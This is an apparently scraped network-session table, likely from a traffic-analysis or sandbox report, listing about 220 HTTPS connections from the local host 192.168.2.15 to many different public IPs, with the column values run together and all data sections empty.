                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9868192.168.2.155845032.158.26.139443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9869192.168.2.155431841.83.16.68443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9870192.168.2.154023417.84.142.220443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9871192.168.2.1557006124.50.221.122443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9872192.168.2.1550582198.17.35.134443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9873192.168.2.153614214.12.72.47443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9874192.168.2.1551698209.244.108.149443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9875192.168.2.1536466145.25.151.234443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9876192.168.2.155329631.77.134.55443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9877192.168.2.154816641.7.247.239443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9878192.168.2.1539600107.235.199.221443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9879192.168.2.155162424.169.31.147443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9880192.168.2.15409189.134.219.174443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9881192.168.2.155013613.48.90.57443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9882192.168.2.153363627.147.160.86443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9883192.168.2.1549426195.163.27.33443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9884192.168.2.155282848.100.168.172443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9885192.168.2.155389482.117.118.138443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9886192.168.2.1546908100.50.102.90443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9887192.168.2.154256636.172.226.32443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9888192.168.2.1535798109.251.194.48443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9889192.168.2.155297219.189.71.157443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9890192.168.2.1550290106.38.176.172443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9891192.168.2.1533884200.166.144.24443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9892192.168.2.155864813.110.144.203443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9893192.168.2.1558848211.49.78.221443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9894192.168.2.1559902180.186.164.236443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9895192.168.2.1541584119.110.249.145443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9896192.168.2.153892081.116.177.80443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9897192.168.2.155779275.214.25.207443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9898192.168.2.1535612182.122.228.179443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9899192.168.2.1549168218.56.211.40443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9900192.168.2.1553806216.67.36.157443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9901192.168.2.1554632207.210.8.186443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9902192.168.2.1542170165.84.95.185443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9903192.168.2.1547356223.206.206.86443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9904192.168.2.1554522146.55.112.178443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9905192.168.2.154844846.44.123.28443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9906192.168.2.155877444.153.102.226443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9907192.168.2.154031469.111.81.6443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9908192.168.2.1538434218.90.238.206443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9909192.168.2.1557828201.37.254.241443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9910192.168.2.1543244106.139.53.237443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9911192.168.2.154156018.13.49.83443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9912192.168.2.1545170159.29.134.148443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9913192.168.2.1540142110.206.165.199443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9914192.168.2.1553758173.190.255.215443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9915192.168.2.155886643.240.231.135443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9916192.168.2.1539080157.85.220.2443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9917192.168.2.1541800213.122.174.1443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9918192.168.2.1549210206.11.46.117443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9919192.168.2.1533168188.190.81.169443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9920192.168.2.154345072.14.161.145443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9921192.168.2.1538044172.85.43.142443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9922192.168.2.1547560126.60.254.97443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9923192.168.2.154335277.42.1.255443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9924192.168.2.1547932196.193.209.122443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9925192.168.2.1556946151.235.216.183443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9926192.168.2.155483676.226.8.132443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9927192.168.2.1547532143.78.119.90443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9928192.168.2.1549428212.212.21.192443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9929192.168.2.155813262.157.80.252443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9930192.168.2.155042058.35.40.113443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9931192.168.2.1540362115.227.31.140443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9932192.168.2.154106097.197.198.33443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9933192.168.2.154626643.82.205.161443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9934192.168.2.153687678.143.178.33443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9935192.168.2.1541554200.125.126.87443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9936192.168.2.1535100103.82.70.105443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9937192.168.2.1555202193.87.141.24443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9938192.168.2.154640646.148.43.69443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9939192.168.2.1550250146.215.205.68443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9940192.168.2.1545406220.105.108.107443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9941192.168.2.154403066.133.7.18443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9942192.168.2.1540902121.144.88.225443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9943192.168.2.1537598177.188.14.27443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9944192.168.2.155177688.69.157.200443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9945192.168.2.155306088.77.206.99443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9946192.168.2.154786053.203.243.254443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9947192.168.2.1554934151.11.199.190443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9948192.168.2.1535748176.43.225.21443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9949192.168.2.155638620.104.147.53443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9950192.168.2.154334696.36.212.153443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9951192.168.2.1547040104.15.164.212443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9952192.168.2.1538436133.163.84.146443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9953192.168.2.1537126172.211.80.70443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9954192.168.2.155327890.197.195.83443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9955192.168.2.155222053.46.100.248443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9956192.168.2.1557236217.247.100.49443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9957192.168.2.1537376171.0.16.21443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9958192.168.2.154621265.38.231.217443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9959192.168.2.1532820183.116.199.100443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9960192.168.2.1540238100.174.226.179443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9961192.168.2.155091218.185.7.73443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9962192.168.2.153768671.191.214.36443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9963192.168.2.1557344195.230.163.217443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9964192.168.2.1549682191.140.45.20443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9965192.168.2.1548906144.172.198.150443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9966192.168.2.155802692.120.43.36443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9967192.168.2.153960050.176.69.199443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9968192.168.2.156004627.182.146.187443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9969192.168.2.155192657.53.178.228443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9970192.168.2.1560766194.42.149.236443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9971192.168.2.1540240179.175.14.191443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9972192.168.2.153798490.27.84.205443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9973192.168.2.1546606104.47.196.207443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9974192.168.2.1553070173.143.58.3443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9975192.168.2.155845867.22.162.3443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9976192.168.2.155628214.173.32.195443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9977192.168.2.1556392168.58.199.14443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9978192.168.2.1542280122.132.163.217443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9979192.168.2.154141812.242.11.122443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9980192.168.2.154681464.248.126.45443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9981192.168.2.1533886197.2.10.241443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9982192.168.2.1546872113.68.247.86443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9983192.168.2.1536236220.37.3.101443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9984192.168.2.1553150163.211.192.84443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9985192.168.2.1539598134.73.7.231443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9986192.168.2.153972469.20.34.29443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9987192.168.2.15596944.171.33.110443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9988192.168.2.1554350219.117.181.144443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9989192.168.2.1544818105.168.216.240443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9990192.168.2.1539884175.207.174.89443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9991192.168.2.1551628220.17.114.80443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9992192.168.2.154124449.13.248.156443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9993192.168.2.1550004192.246.111.183443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9994192.168.2.1547866190.88.81.40443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9995192.168.2.1536222152.234.144.213443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9996192.168.2.1557532161.170.91.22443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9997192.168.2.1540790187.94.175.141443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9998192.168.2.154592635.38.183.136443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9999192.168.2.1544524129.123.228.251443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10000192.168.2.1533834117.106.153.83443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10001192.168.2.1544332172.127.103.67443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10002192.168.2.1552588184.10.166.124443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10003192.168.2.1537146142.2.50.117443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10004192.168.2.1542034211.166.72.41443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10005192.168.2.1544026118.223.226.99443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10006192.168.2.1534796203.116.21.185443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10007192.168.2.15363265.33.120.20443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10008192.168.2.155130265.41.194.112443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10009192.168.2.1555202108.182.73.176443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10010192.168.2.1533798169.31.104.151443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10011192.168.2.153688241.206.136.142443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10012192.168.2.1537916212.155.119.35443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10013192.168.2.154006077.170.239.137443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10014192.168.2.1537400132.209.177.148443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10015192.168.2.1542486142.20.155.119443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10016192.168.2.155745294.168.7.120443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10017192.168.2.1555662159.169.94.105443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10018192.168.2.1560316115.235.185.53443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10019192.168.2.1550436130.181.64.186443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10020192.168.2.1537814208.176.100.44443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10021192.168.2.155923214.235.116.0443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10022192.168.2.1545482132.249.24.177443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10023192.168.2.1555344205.133.11.120443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10024192.168.2.154485287.179.120.245443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10025192.168.2.1538752110.229.101.80443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10026192.168.2.1556448181.107.188.194443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10027192.168.2.1541600203.134.180.91443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10028192.168.2.1545844101.67.148.197443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10029192.168.2.1555574138.129.164.183443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10030192.168.2.1535880110.132.61.18443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10031192.168.2.1533240148.151.214.55443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10032192.168.2.1553068196.217.30.191443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10033192.168.2.1542582141.197.75.37443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10034192.168.2.154191264.158.228.191443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10035192.168.2.1536552103.87.241.81443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10036192.168.2.1535418223.101.177.15443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10037192.168.2.1555030220.118.186.8443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10038192.168.2.1542344202.118.191.104443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10039192.168.2.1544492188.119.146.233443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10040192.168.2.1535744138.118.68.228443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10041192.168.2.1532850146.236.118.32443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10042192.168.2.1554990107.131.60.247443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10043192.168.2.1557208181.53.107.110443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10044192.168.2.1544544155.0.108.63443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10045192.168.2.153508070.214.17.250443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10046192.168.2.1546108144.224.102.191443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10047192.168.2.1554978143.155.167.179443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10048192.168.2.154691453.62.10.71443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10049192.168.2.1539152147.147.111.109443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10050192.168.2.1538162199.111.240.76443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10051192.168.2.1534424196.225.184.14443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10052192.168.2.1542006193.1.54.210443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10053192.168.2.153769267.80.251.230443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10054192.168.2.1559764207.16.234.232443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10055192.168.2.1545888128.90.78.187443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10056192.168.2.1560618221.163.138.229443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10057192.168.2.1535132180.200.13.87443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10058192.168.2.1537374206.216.6.160443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10059192.168.2.154053238.215.183.28443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10060192.168.2.1534156115.97.22.134443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10061192.168.2.154441067.241.42.189443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10062192.168.2.1560326175.208.175.26443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10063192.168.2.1559396110.28.221.155443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10064192.168.2.1558282221.239.151.205443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10065192.168.2.153880661.81.10.151443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10066192.168.2.1552690186.156.236.255443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10067192.168.2.1541144189.28.135.121443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10068192.168.2.1560430193.245.107.150443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10069192.168.2.1545976158.216.251.103443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10070192.168.2.1560182105.216.245.230443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10071192.168.2.1543160159.9.119.92443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10072192.168.2.1552022111.199.29.166443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10073192.168.2.1558478111.57.145.101443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10074192.168.2.1548622170.234.172.47443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10075192.168.2.154279035.21.89.89443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10076192.168.2.155003223.106.203.187443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10077192.168.2.1534314131.197.176.214443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10078192.168.2.15489384.46.145.52443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10079192.168.2.1558518118.202.246.103443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10080192.168.2.154093472.153.32.26443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10081192.168.2.154774870.127.180.225443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10082192.168.2.154331879.197.41.35443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10083192.168.2.1556712164.106.21.210443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10084192.168.2.1555346124.146.42.23443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10085192.168.2.156061481.240.122.68443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10086192.168.2.1544550213.213.168.113443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10087192.168.2.1552160167.124.138.226443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10088192.168.2.1542224162.229.156.114443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
